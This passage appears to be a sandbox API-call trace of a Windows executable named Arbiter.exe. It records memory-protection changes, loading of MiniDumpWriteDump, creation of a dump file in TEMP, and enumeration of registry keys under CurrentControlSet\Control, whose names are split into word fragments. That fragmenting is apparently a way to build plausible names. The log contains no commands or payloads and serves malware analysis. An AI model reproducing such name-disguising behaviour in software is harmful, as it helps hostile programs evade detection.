lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0069.615] VirtualProtect (in: lpAddress=0x40a000, dwSize=0x658, flNewProtect=0x2d0148, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0069.615] VirtualProtect (in: lpAddress=0x40b000, dwSize=0x4658, flNewProtect=0x2d0140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0069.616] VirtualProtect (in: lpAddress=0x410000, dwSize=0x938, flNewProtect=0x2d0140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0069.616] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0069.617] GetProcessHeap () returned 0x6d0000 [0069.617] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4681) returned 0x6e8590 [0069.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0xcfd3e9c0, dwHighDateTime=0x1d64ac6)) [0069.641] QueryPerformanceFrequency (in: lpFrequency=0x18ff64 | out: lpFrequency=0x18ff64*=100000000) returned 1 [0069.663] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=19028694260) returned 1 [0069.663] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xbc [0069.663] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0069.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x208) returned 0x6ecc20 [0069.664] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x6ecc20, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\Arbiter.exe" (normalized: "c:\\windows\\syswow64\\arbiter.exe")) returned 0x1f [0069.664] StrRChrW (lpStart="C:\\Windows\\SysWOW64\\Arbiter.exe", lpEnd=0x0, wMatch=0x5c) returned="\\Arbiter.exe" [0069.664] lstrlenW (lpString="Arbiter.exe") returned 11 [0069.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7b68 [0069.664] PathFindExtensionW (pszPath="Arbiter.exe") returned=".exe" [0069.664] StrChrW (lpStart="Arbiter", wMatch=0x3a) returned 0x0 [0069.665] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x75590000 [0069.690] GetProcAddress (hModule=0x75590000, lpProcName="MiniDumpWriteDump") returned 0x755d5d38 [0069.690] lstrlenW (lpString="Arbiter") returned 7 [0069.690] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x11 [0069.690] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3a) returned 0x6e5b00 [0069.690] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x6e5b00, nSize=0x11 | out: lpDst="C:\\Windows\\TEMP\\") returned 0x11 [0069.690] lstrcatW (in: lpString1="C:\\Windows\\TEMP\\", lpString2="Arbiter" | out: lpString1="C:\\Windows\\TEMP\\Arbiter") returned="C:\\Windows\\TEMP\\Arbiter" [0069.690] lstrcatW (in: lpString1="C:\\Windows\\TEMP\\Arbiter", lpString2=".dmp" | out: lpString1="C:\\Windows\\TEMP\\Arbiter.dmp") returned="C:\\Windows\\TEMP\\Arbiter.dmp" [0069.690] CreateFileW (lpFileName="C:\\Windows\\TEMP\\Arbiter.dmp" (normalized: "c:\\windows\\temp\\arbiter.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc0 [0069.693] SetFilePointer (in: hFile=0xc0, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0069.693] SetEndOfFile (hFile=0xc0) returned 1 [0069.694] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40416a) returned 0x0 [0069.694] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x18ff88 | out: phkResult=0x18ff88*=0xc4) returned 0x0 [0069.694] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x0, lpName=0x18fd58, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0069.694] lstrlenW (lpString="ACPI") returned 4 [0069.694] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e7be8 [0069.694] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1, lpName=0x18fd58, cchName=0x104 | out: lpName="AGP") returned 0x0 [0069.694] lstrlenW (lpString="AGP") returned 3 [0069.694] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7c08 [0069.694] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2, lpName=0x18fd58, cchName=0x104 | out: lpName="AppID") returned 0x0 [0069.694] lstrlenW (lpString="AppID") returned 5 [0069.694] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7c28 [0069.694] lstrcmpW (lpString1="agp", lpString2="app") returned -1 [0069.696] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12) returned 0x6e7c68 [0069.697] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3, lpName=0x18fd58, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0069.697] lstrlenW (lpString="Arbiters") returned 8 [0069.697] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ece98 [0069.697] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4, lpName=0x18fd58, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0069.697] lstrlenW (lpString="BackupRestore") returned 13 [0069.697] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ecec0 [0069.697] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ecee8 [0069.697] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x5, lpName=0x18fd58, cchName=0x104 | out: lpName="Class") returned 0x0 [0069.697] lstrlenW (lpString="Class") returned 5 [0069.697] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7c88 [0069.697] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x6, lpName=0x18fd58, cchName=0x104 | out: lpName="CMF") returned 0x0 [0069.697] lstrlenW (lpString="CMF") returned 3 [0069.697] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7ca8 [0069.697] lstrcmpW (lpString1="agp", lpString2="cmf") returned -1 [0069.697] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0069.697] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x7, lpName=0x18fd58, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0069.697] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0069.697] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12) returned 0x6e7cc8 [0069.697] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0069.697] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ecf10 [0069.697] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0069.697] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x22) returned 0x6edba0 [0069.697] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x8, lpName=0x18fd58, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0069.697] lstrlenW (lpString="COM Name Arbiter") returned 16 [0069.698] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7ce8 [0069.698] lstrcmpW (lpString1="agp", lpString2="com") returned -1 [0069.698] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0069.698] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0069.698] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e7d08 [0069.698] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0069.698] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ecf38 [0069.698] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0069.698] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x9, lpName=0x18fd58, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0069.698] lstrlenW (lpString="ComputerName") returned 12 [0069.698] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ecf60 [0069.698] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0069.698] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e7d28 [0069.698] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0069.698] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0069.698] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7d28 | out: hHeap=0x6d0000) returned 1 [0069.698] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xa, lpName=0x18fd58, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0069.698] lstrlenW (lpString="ContentIndex") returned 12 [0069.698] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ecf88 [0069.698] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0069.698] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0069.698] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7d28 [0069.699] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0069.699] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xb, lpName=0x18fd58, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0069.699] lstrlenW (lpString="CrashControl") returned 12 [0069.699] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7d48 [0069.699] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0069.699] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0069.699] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ecfb0 [0069.699] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0069.699] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0069.699] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0069.699] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xc, lpName=0x18fd58, cchName=0x104 | out: lpName="CriticalDeviceDatabase") returned 0x0 [0069.699] lstrlenW (lpString="CriticalDeviceDatabase") returned 22 [0069.699] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ecfd8 [0069.699] lstrcmpW (lpString1="arbiters", lpString2="critical") returned -1 [0069.699] lstrcmpW (lpString1="computer", lpString2="critical") returned -1 [0069.699] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed000 [0069.699] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0069.699] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0069.699] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ed000 | out: hHeap=0x6d0000) returned 1 [0069.699] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed000 [0069.699] lstrcmpW (lpString1="arbiters", lpString2="database") returned -1 [0069.699] lstrcmpW (lpString1="computer", lpString2="database") returned -1 [0069.699] lstrcmpW (lpString1="critical", lpString2="database") returned -1 [0069.700] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xd, lpName=0x18fd58, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0069.700] lstrlenW (lpString="Cryptography") returned 12 [0069.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x26) returned 0x6edbd0 [0069.700] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xe, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0069.700] lstrlenW (lpString="DeviceClasses") returned 13 [0069.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed028 [0069.700] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0069.700] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0069.700] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ed028 | out: hHeap=0x6d0000) returned 1 [0069.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed028 [0069.700] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0069.700] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0069.700] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0069.700] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0069.700] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xf, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0069.700] lstrlenW (lpString="DeviceOverrides") returned 15 [0069.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed050 [0069.700] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0069.700] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0069.700] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ed050 | out: hHeap=0x6d0000) returned 1 [0069.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6ed050 [0069.700] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x10, lpName=0x18fd58, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0069.700] lstrlenW (lpString="Diagnostics") returned 11 [0069.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x24) returned 0x6edc00 [0069.701] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x11, lpName=0x18fd58, cchName=0x104 | out: lpName="Els") returned 0x0 [0069.701] lstrlenW (lpString="Els") returned 3 [0069.701] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7d68 [0069.701] lstrcmpW (lpString1="agp", lpString2="els") returned -1 [0069.701] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0069.701] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0069.701] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0069.701] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x12, lpName=0x18fd58, cchName=0x104 | out: lpName="Errata") returned 0x0 [0069.701] lstrlenW (lpString="Errata") returned 6 [0069.701] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed078 [0069.701] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0069.701] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0069.701] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x13, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0069.701] lstrlenW (lpString="FileSystem") returned 10 [0069.701] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e7d88 [0069.701] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0069.701] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0069.701] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed0a0 [0069.701] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0069.701] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0069.701] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0069.701] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x14, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0069.701] lstrlenW (lpString="FileSystemUtilities") returned 19 [0069.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e7da8 [0069.702] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0069.702] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0069.702] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0069.702] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7da8 | out: hHeap=0x6d0000) returned 1 [0069.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed0c8 [0069.702] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0069.702] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0069.702] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0069.702] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0069.702] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ed0c8 | out: hHeap=0x6d0000) returned 1 [0069.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6ed0c8 [0069.702] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0069.702] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x15, lpName=0x18fd58, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0069.702] lstrlenW (lpString="GraphicsDrivers") returned 15 [0069.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed0f0 [0069.702] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0069.702] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0069.702] lstrcmpW (lpString1="critical", lpString2="graphics") returned -1 [0069.702] lstrcmpW (lpString1="database", lpString2="graphics") returned -1 [0069.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed118 [0069.702] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0069.702] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0069.703] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0069.703] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0069.703] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0069.703] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x16, lpName=0x18fd58, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0069.703] lstrlenW (lpString="GroupOrderList") returned 14 [0069.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7da8 [0069.703] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0069.703] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0069.703] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0069.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7dc8 [0069.703] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0069.703] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0069.703] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0069.703] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0069.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e7de8 [0069.703] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0069.703] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0069.703] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0069.703] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x17, lpName=0x18fd58, cchName=0x104 | out: lpName="HAL") returned 0x0 [0069.703] lstrlenW (lpString="HAL") returned 3 [0069.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7e08 [0069.703] lstrcmpW (lpString1="agp", lpString2="hal") returned -1 [0069.704] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0069.704] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0069.704] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0069.704] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0069.704] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x18, lpName=0x18fd58, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0069.704] lstrlenW (lpString="IDConfigDB") returned 10 [0069.704] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed140 [0069.704] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0069.704] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0069.704] lstrcmpW (lpString1="critical", lpString2="idconfig") returned -1 [0069.704] lstrcmpW (lpString1="database", lpString2="idconfig") returned -1 [0069.704] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0069.704] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12) returned 0x6e7e28 [0069.704] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0069.704] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0069.704] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x19, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0069.704] lstrlenW (lpString="Keyboard Layout") returned 15 [0069.704] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed168 [0069.704] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0069.704] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0069.704] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0069.705] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0069.705] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0069.705] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0069.705] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed190 [0069.705] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0069.705] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0069.705] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0069.705] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0069.705] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1a, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0069.705] lstrlenW (lpString="Keyboard Layouts") returned 16 [0069.705] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed1b8 [0069.705] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0069.705] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0069.705] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0069.705] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0069.706] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0069.706] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0069.706] lstrcmpW (lpString1="keyboard", lpString2="keyboard") returned 0 [0069.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ed1b8 | out: hHeap=0x6d0000) returned 1 [0069.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed1b8 [0069.706] lstrcmpW (lpString1="restore", lpString2="layouts") returned 1 [0069.706] lstrcmpW (lpString1="arbiter", lpString2="layouts") returned -1 [0069.706] lstrcmpW (lpString1="content", lpString2="layouts") returned -1 [0069.706] lstrcmpW (lpString1="control", lpString2="layouts") returned -1 [0069.706] lstrcmpW (lpString1="classes", lpString2="layouts") returned -1 [0069.706] lstrcmpW (lpString1="drivers", lpString2="layouts") returned -1 [0069.706] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1b, lpName=0x18fd58, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0069.706] lstrlenW (lpString="Lsa") returned 3 [0069.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7e48 [0069.706] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0069.706] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0069.706] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0069.706] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0069.706] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0069.706] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0069.706] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1c, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0069.706] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0069.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7e68 [0069.707] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0069.707] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0069.707] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0069.707] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0069.707] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0069.707] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0069.707] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0069.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7e68 | out: hHeap=0x6d0000) returned 1 [0069.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6ed1e0 [0069.707] lstrcmpW (lpString1="overrides", lpString2="extension") returned 1 [0069.707] lstrcmpW (lpString1="utilities", lpString2="extension") returned 1 [0069.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed208 [0069.707] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0069.707] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0069.707] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0069.707] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0069.707] lstrcmpW (lpString1="layout", lpString2="config") returned 1 [0069.707] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1d, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0069.707] lstrlenW (lpString="LsaInformation") returned 14 [0069.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7e68 [0069.707] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0069.707] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0069.708] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0069.708] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0069.708] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0069.708] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0069.708] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0069.708] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7e68 | out: hHeap=0x6d0000) returned 1 [0069.708] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x24) returned 0x6edc30 [0069.708] lstrcmpW (lpString1="diagnostics", lpString2="information") returned -1 [0069.708] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1e, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0069.708] lstrlenW (lpString="MediaCategories") returned 15 [0069.708] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7e68 [0069.708] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0069.708] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0069.708] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0069.708] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0069.708] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0069.708] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x22) returned 0x6edc60 [0069.708] lstrcmpW (lpString1="installers", lpString2="categories") returned 1 [0069.708] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1f, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaDRM") returned 0x0 [0069.708] lstrlenW (lpString="MediaDRM") returned 8 [0069.708] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7e88 [0069.708] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0069.709] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0069.709] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0069.709] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0069.709] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0069.709] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0069.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7e88 | out: hHeap=0x6d0000) returned 1 [0069.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7e88 [0069.709] lstrcmpW (lpString1="agp", lpString2="drm") returned -1 [0069.709] lstrcmpW (lpString1="app", lpString2="drm") returned -1 [0069.709] lstrcmpW (lpString1="cmf", lpString2="drm") returned -1 [0069.709] 